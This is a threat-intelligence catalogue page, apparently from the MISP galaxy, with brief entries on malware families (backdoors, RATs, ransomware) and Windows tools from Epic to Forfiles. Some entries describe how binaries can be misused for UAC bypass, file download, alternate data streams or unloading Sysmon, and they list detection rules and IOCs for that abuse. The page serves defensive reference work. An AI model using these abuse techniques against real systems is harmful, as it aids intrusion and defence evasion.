tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Epic
Epic is a backdoor that has been used by Turla. [Kaspersky Turla]
Internal MISP references
UUID a7e71387-b276-413c-a0de-4cf07e39b158
which can be used as unique global reference for Epic
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0091 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
esentutl
esentutl is a command-line tool that provides database utilities for the Windows Extensible Storage Engine.[Microsoft Esentutl]
Internal MISP references
UUID a7589733-6b04-4215-a4e7-4b62cd4610fa
which can be used as unique global reference for esentutl
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0404 |
source | MITRE |
tags | ['ee88899a-2bf0-4b96-bf69-5b686fa463c3', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Eventvwr
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Displays Windows Event Logs in a GUI window.
Author: Jacob Gajek
Paths:
* C:\Windows\System32\eventvwr.exe
* C:\Windows\SysWOW64\eventvwr.exe
Resources:
* https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
* https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
* https://twitter.com/orange_8361/status/1518970259868626944
Detection:
* Sigma: proc_creation_win_uac_bypass_eventvwr.yml
* Sigma: registry_set_uac_bypass_eventvwr.yml
* Sigma: file_event_win_uac_bypass_eventvwr.yml
* Elastic: privilege_escalation_uac_bypass_event_viewer.toml
* Splunk: eventvwr_uac_bypass.yml
* IOC: eventvwr.exe launching child process other than mmc.exe
* IOC: Creation or modification of the registry value HKCU\Software\Classes\mscfile\shell\open\command[Eventvwr.exe - LOLBAS Project]
Internal MISP references
UUID 4c371bd9-c97c-42ab-b913-1e19cd409382
which can be used as unique global reference for Eventvwr
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5105 |
source | Tidal Cyber |
tags | ['59d03fb8-0620-468a-951c-069473cb86bc', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
EvilBunny
EvilBunny is a C++ malware sample observed since 2011 that was designed to be an execution platform for Lua scripts.[Cyphort EvilBunny Dec 2014]
Internal MISP references
UUID 300e8176-e7ee-44ef-8d10-dff96502f6c6
which can be used as unique global reference for EvilBunny
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0396 |
source | MITRE |
type | ['malware'] |
EvilGinx
EvilGinx is an open-source software project. According to its GitHub repository, EvilGinx is a "Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication".[GitHub evilginx2]
Internal MISP references
UUID 4892c22d-6fd4-4876-8e8a-af968cf61ecc
which can be used as unique global reference for EvilGinx
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5078 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
EvilGrab
EvilGrab is a malware family with common reconnaissance capabilities. It has been deployed by menuPass via malicious Microsoft Office documents as part of spearphishing campaigns. [PWC Cloud Hopper Technical Annex April 2017]
Internal MISP references
UUID e862419c-d6b6-4433-a02a-c1cc98ea6f9e
which can be used as unique global reference for EvilGrab
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0152 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
EVILNUM
EVILNUM is a fully capable backdoor that was first identified in 2018. EVILNUM is used by the APT group Evilnum, which has the same name.[ESET EvilNum July 2020][Prevailion EvilNum May 2020]
Internal MISP references
UUID e0eaae6d-5137-4053-bf37-ff90bf5767a9
which can be used as unique global reference for EVILNUM
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0568 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Exaramel for Linux
Exaramel for Linux is a backdoor written in the Go Programming Language and compiled as a 64-bit ELF binary. The Windows version is tracked separately under Exaramel for Windows.[ESET TeleBots Oct 2018]
Internal MISP references
UUID c773f709-b5fe-4514-9d88-24ceb0dd8063
which can be used as unique global reference for Exaramel for Linux
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0401 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Exaramel for Windows
Exaramel for Windows is a backdoor used for targeting Windows systems. The Linux version is tracked separately under Exaramel for Linux.[ESET TeleBots Oct 2018]
Internal MISP references
UUID 21569dfb-c9f1-468e-903e-348f19dbae1f
which can be used as unique global reference for Exaramel for Windows
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0343 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Excel
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Office binary
Author: Reegun J (OCBC Bank)
Paths: * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe * C:\Program Files (x86)\Microsoft Office\Office16\Excel.exe * C:\Program Files\Microsoft Office\Office16\Excel.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Excel.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Excel.exe * C:\Program Files (x86)\Microsoft Office\Office15\Excel.exe * C:\Program Files\Microsoft Office\Office15\Excel.exe * C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Excel.exe * C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Excel.exe * C:\Program Files (x86)\Microsoft Office\Office14\Excel.exe * C:\Program Files\Microsoft Office\Office14\Excel.exe * C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe * C:\Program Files\Microsoft Office\Office12\Excel.exe * C:\Program Files\Microsoft Office\Office12\Excel.exe
Resources: * https://twitter.com/reegun21/status/1150032506504151040 * https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
Detection: * Sigma: proc_creation_win_lolbin_office.yml * IOC: Suspicious Office application Internet/network traffic[Excel.exe - LOLBAS Project]
Internal MISP references
UUID 46efd94e-afd2-4536-8525-0619fc56966f
which can be used as unique global reference for Excel
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5221 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ExMatter
ExMatter is a custom data exfiltration tool. It was first observed in November 2021 during intrusions involving BlackMatter ransomware, and more recently has been used during BlackCat ransomware attacks. In August 2022, researchers observed a “heavily updated” version of ExMatter, which featured expanded protocols for exfiltrating data, a data corruption capability, enhanced defense evasion abilities, and a narrower range of targeted file types.[Symantec Noberus September 22 2022]
Internal MISP references
UUID 068b26ae-39b5-4b4e-8faa-eb304a17687d
which can be used as unique global reference for ExMatter
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5054 |
source | Tidal Cyber |
tags | ['8bf128ad-288b-41bc-904f-093f4fdde745'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Expand
Expand is a Windows utility used to expand one or more compressed CAB files.[Microsoft Expand Utility] It has been used by BBSRAT to decompress a CAB file into executable content.[Palo Alto Networks BBSRAT]
Internal MISP references
UUID 5d7a39e3-c667-45b3-987e-3b0ca49cff61
which can be used as unique global reference for Expand
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0361 |
source | MITRE |
tags | ['182dd4be-bbda-404f-aad1-156a22bbe7a4', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Explorer
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary used for managing files and system components within Windows
Author: Jai Minton
Paths: * C:\Windows\explorer.exe * C:\Windows\SysWOW64\explorer.exe
Resources: * https://twitter.com/CyberRaiju/status/1273597319322058752?s=20 * https://twitter.com/bohops/status/1276356245541335048 * https://twitter.com/bohops/status/986984122563391488
Detection: * Sigma: proc_creation_win_explorer_break_process_tree.yml * Sigma: proc_creation_win_explorer_lolbin_execution.yml * Elastic: initial_access_via_explorer_suspicious_child_parent_args.toml * IOC: Multiple instances of explorer.exe, or explorer.exe using the /root command line, are suspicious.[Explorer.exe - LOLBAS Project]
Internal MISP references
UUID b792d713-fbb4-46e6-94ae-8b9a1f4e794d
which can be used as unique global reference for Explorer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5106 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Explosive
Explosive is a custom-made remote access tool used by the group Volatile Cedar. It was first identified in the wild in 2015.[CheckPoint Volatile Cedar March 2015][ClearSky Lebanese Cedar Jan 2021]
Internal MISP references
UUID 572eec55-2855-49ac-a82e-2c21e9aca27e
which can be used as unique global reference for Explosive
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0569 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Extexport
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Load a DLL located in the c:\test folder with a specific name.
Author: Oddvar Moe
Paths: * C:\Program Files\Internet Explorer\Extexport.exe * C:\Program Files (x86)\Internet Explorer\Extexport.exe
Resources: * http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/
Detection: * Sigma: proc_creation_win_lolbin_extexport.yml * IOC: Extexport.exe loads a DLL and is executed from a folder other than its original path[Extexport.exe - LOLBAS Project]
Internal MISP references
UUID 2e6f1aed-a983-44fb-aed1-b4a3d9cb9488
which can be used as unique global reference for Extexport
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5107 |
source | Tidal Cyber |
tags | ['5b81675a-742a-4ffd-b410-44ce3f1b0831', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ExtPassword
ExtPassword is a tool used to recover passwords from Windows systems.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 363c38fc-8676-4a63-b3f4-f0237565a951
which can be used as unique global reference for ExtPassword
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5030 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Extrac32
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Extract to ADS, copy or overwrite a file with Extrac32.exe
Author: Oddvar Moe
Paths: * C:\Windows\System32\extrac32.exe * C:\Windows\SysWOW64\extrac32.exe
Resources: * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f * https://twitter.com/egre55/status/985994639202283520
Detection: * Elastic: defense_evasion_misc_lolbin_connecting_to_the_internet.toml * Sigma: proc_creation_win_lolbin_extrac32.yml * Sigma: proc_creation_win_lolbin_extrac32_ads.yml[Extrac32.exe - LOLBAS Project]
Internal MISP references
UUID 53dc0180-0309-4489-af75-9c76b2887359
which can be used as unique global reference for Extrac32
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5108 |
source | Tidal Cyber |
tags | ['92092803-19a9-4288-b7fb-08e92e8ea693', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
FakeM
FakeM is a shellcode-based Windows backdoor that has been used by Scarlet Mimic. [Scarlet Mimic Jan 2016]
Internal MISP references
UUID 8c64a330-1457-4c32-ab2f-12b6eb37d607
which can be used as unique global reference for FakeM
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0076 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
FakePenny
FakePenny is ransomware, comprising both a loader and an encryptor, that is believed to have been developed by the North Korean threat actor Moonstone Sleet.[Microsoft Security Blog 5 28 2024]
Internal MISP references
UUID acbff463-ba1c-4d26-ab99-b9aa47b81c68
which can be used as unique global reference for FakePenny
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5321 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
FALLCHILL
FALLCHILL is a RAT that has been used by Lazarus Group since at least 2016 to target the aerospace, telecommunications, and finance industries. It is usually dropped by other Lazarus Group malware or delivered when a victim unknowingly visits a compromised website. [US-CERT FALLCHILL Nov 2017]
Internal MISP references
UUID ea47f1fd-0171-4254-8c92-92b7a5eec5e1
which can be used as unique global reference for FALLCHILL
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0181 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
FatDuke
FatDuke is a backdoor used by APT29 since at least 2016.[ESET Dukes October 2019]
Internal MISP references
UUID 997ff740-1b00-40b6-887a-ef4101e93295
which can be used as unique global reference for FatDuke
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0512 |
source | MITRE |
tags | ['8bf128ad-288b-41bc-904f-093f4fdde745'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Felismus
Felismus is a modular backdoor that has been used by Sowbug. [Symantec Sowbug Nov 2017] [Forcepoint Felismus Mar 2017]
Internal MISP references
UUID c66ed8ab-4692-4948-820e-5ce87cc78db5
which can be used as unique global reference for Felismus
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0171 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
FELIXROOT
FELIXROOT is a backdoor that has been used to target Ukrainian victims. [FireEye FELIXROOT July 2018]
Internal MISP references
UUID 4b1a07cd-4c1f-4d93-a454-07fd59b3039a
which can be used as unique global reference for FELIXROOT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0267 |
source | MITRE |
type | ['malware'] |
Ferocious
Ferocious is a first stage implant composed of VBS and PowerShell scripts that has been used by WIRTE since at least 2021.[Kaspersky WIRTE November 2021]
Internal MISP references
UUID 3e54ba7a-fd4c-477f-9c2d-34b4f69fc091
which can be used as unique global reference for Ferocious
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0679 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Fgdump
Fgdump is a Windows password hash dumper. [Mandiant APT1]
Internal MISP references
UUID 1bbf04bb-d869-48c5-a538-70a25503de1d
which can be used as unique global reference for Fgdump
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0120 |
source | MITRE |
type | ['tool'] |
FileZilla
FileZilla is a cross-platform tool used to transfer files over the File Transfer Protocol (FTP) to a site, server, or host.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID f2a6f899-15a8-4d77-bebd-14bc03958764
which can be used as unique global reference for FileZilla
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5031 |
source | Tidal Cyber |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '8bf128ad-288b-41bc-904f-093f4fdde745', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Final1stspy
Final1stspy is a dropper family that has been used to deliver DOGCALL.[Unit 42 Nokki Oct 2018]
Internal MISP references
UUID eb4dc358-e353-47fc-8207-b7cb10d580f7
which can be used as unique global reference for Final1stspy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0355 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Findstr
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Write to ADS, discover, or download files with Findstr.exe
Author: Oddvar Moe
Paths: * C:\Windows\System32\findstr.exe * C:\Windows\SysWOW64\findstr.exe
Resources: * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Detection: * Sigma: proc_creation_win_lolbin_findstr.yml[Findstr.exe - LOLBAS Project]
Internal MISP references
UUID a62634f8-8f42-4874-9669-bea2e053dfea
which can be used as unique global reference for Findstr
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5109 |
source | Tidal Cyber |
tags | ['6ca537bb-94b6-4b12-8978-6250baa6a5cb', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
FinFisher
FinFisher is a government-grade commercial surveillance spyware reportedly sold exclusively to government agencies for use in targeted and lawful criminal investigations. It is heavily obfuscated and uses multiple anti-analysis techniques. It has other variants including Wingbird. [FinFisher Citation] [Microsoft SIR Vol 21] [FireEye FinSpy Sept 2017] [Securelist BlackOasis Oct 2017] [Microsoft FinFisher March 2018]
Internal MISP references
UUID 41f54ce1-842c-428a-977f-518a5b63b4d7
which can be used as unique global reference for FinFisher
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Android', 'Windows'] |
software_attack_id | S0182 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Finger
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
Author: Ruben Revuelta
Paths: * c:\windows\system32\finger.exe * c:\windows\syswow64\finger.exe
Resources: * https://twitter.com/DissectMalware/status/997340270273409024 * https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
Detection: * Sigma: proc_creation_win_finger_usage.yml * IOC: finger.exe should not be run on a normal workstation. * IOC: finger.exe connecting to external resources.[Finger.exe - LOLBAS Project]
Internal MISP references
UUID a9ce311d-dd8c-497d-b38f-b535d7318ed4
which can be used as unique global reference for Finger
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5110 |
source | Tidal Cyber |
tags | ['1da4f610-4c54-46a3-b9b3-c38a002b623e', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
FIVEHANDS
FIVEHANDS is a customized version of DEATHRANSOM ransomware written in C++. FIVEHANDS has been used since at least 2021, including in Ransomware-as-a-Service (RaaS) campaigns, sometimes along with SombRAT.[FireEye FiveHands April 2021][NCC Group Fivehands June 2021]
Internal MISP references
UUID 84187393-2fe9-4136-8720-a6893734ee8c
which can be used as unique global reference for FIVEHANDS
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0618 |
source | MITRE |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', 'f1ad9eba-f4fd-4aec-92c0-833ac14d741b', '5e7433ad-a894-4489-93bc-41e90da90019', '15787198-6c8b-4f79-bf50-258d55072fee', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Flagpro
Flagpro is a Windows-based, first-stage downloader that has been used by BlackTech since at least October 2020. It has primarily been used against defense, media, and communications companies in Japan.[NTT Security Flagpro new December 2021]
Internal MISP references
UUID 977aaf8a-2216-40f0-8682-61dd91638147
which can be used as unique global reference for Flagpro
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0696 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Flame
Flame is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. [Kaspersky Flame]
Internal MISP references
UUID 87604333-638f-4f4a-94e0-16aa825dd5b8
which can be used as unique global reference for Flame
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0143 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647'] |
type | ['malware'] |
FLASHFLOOD
FLASHFLOOD is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps. [FireEye APT30]
Internal MISP references
UUID 44a5e62a-6de4-49d2-8f1b-e68ecdf9f332
which can be used as unique global reference for FLASHFLOOD
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0036 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
FlawedAmmyy
FlawedAmmyy is a remote access tool (RAT) that was first seen in early 2016. The code for FlawedAmmyy was based on leaked source code for a version of Ammyy Admin, a remote access software.[Proofpoint TA505 Mar 2018]
Internal MISP references
UUID 308dbe77-3d58-40bb-b0a5-cd00f152dc60
which can be used as unique global reference for FlawedAmmyy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0381 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
FlawedGrace
FlawedGrace is a fully featured remote access tool (RAT) written in C++ that was first observed in late 2017.[Proofpoint TA505 Jan 2019]
Internal MISP references
UUID c558e948-c817-4494-a95d-ad3207f10e26
which can be used as unique global reference for FlawedGrace
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0383 |
source | MITRE |
tags | ['1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '84615fe0-c2a5-4e07-8957-78ebc29b4635', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
FleetDeck
FleetDeck is a commercial remote monitoring and management (RMM) tool that enables remote desktop access and “virtual terminal” capabilities. Government and commercial reports indicate that financially motivated adversaries, including BlackCat (AKA ALPHV or Noberus) actors and Scattered Spider (AKA 0ktapus or UNC3944), have used FleetDeck for command and control and persistence purposes during intrusions.[Cyber Centre ALPHV/BlackCat July 25 2023][CrowdStrike Scattered Spider SIM Swapping December 22 2022]
Internal MISP references
UUID 68758d3a-ec4b-4c19-933d-b4c3000281b2
which can be used as unique global reference for FleetDeck
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5056 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
FLIPSIDE
FLIPSIDE is a simple tool similar to Plink that is used by FIN5 to maintain access to victims. [Mandiant FIN5 GrrCON Oct 2016]
Internal MISP references
UUID 18002747-ddcc-42c1-b0ca-1e598a9f1919
which can be used as unique global reference for FLIPSIDE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0173 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
fltMC
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Filter Manager Control Program used by Windows
Author: John Lambert
Paths: * C:\Windows\System32\fltMC.exe
Resources: * https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon
Detection: * Sigma: proc_creation_win_fltmc_unload_driver_sysmon.yml * Elastic: defense_evasion_via_filter_manager.toml * Splunk: unload_sysmon_filter_driver.yml * IOC: 4688 events with fltMC.exe[fltMC.exe - LOLBAS Project]
Internal MISP references
UUID 43d57826-cd15-4154-8f04-38351c96986e
which can be used as unique global reference for fltMC
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5111 |
source | Tidal Cyber |
tags | ['49bbb074-2406-4f27-ad77-d2e433ba1ccb', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
FoggyWeb
FoggyWeb is a passive and highly-targeted backdoor capable of remotely exfiltrating sensitive information from a compromised Active Directory Federated Services (AD FS) server. It has been used by APT29 since at least early April 2021.[MSTIC FoggyWeb September 2021]
Internal MISP references
UUID bc11844e-0348-4eed-a48a-0554d68db38c
which can be used as unique global reference for FoggyWeb
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0661 |
source | MITRE |
tags | ['8bf128ad-288b-41bc-904f-093f4fdde745'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Forfiles
Forfiles is a Windows utility commonly used in batch jobs to execute commands on one or more selected files or directories (ex: list all directories in a drive, read the first line of all files created yesterday, etc.). Forfiles can be executed from either the command line, Run window, or batch files/scripts. [Microsoft Forfiles Aug 2016]
Internal MISP references
UUID c6dc67a6-587d-4700-a7de-bee043a0031a
which can be used as unique global reference for Forfiles
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
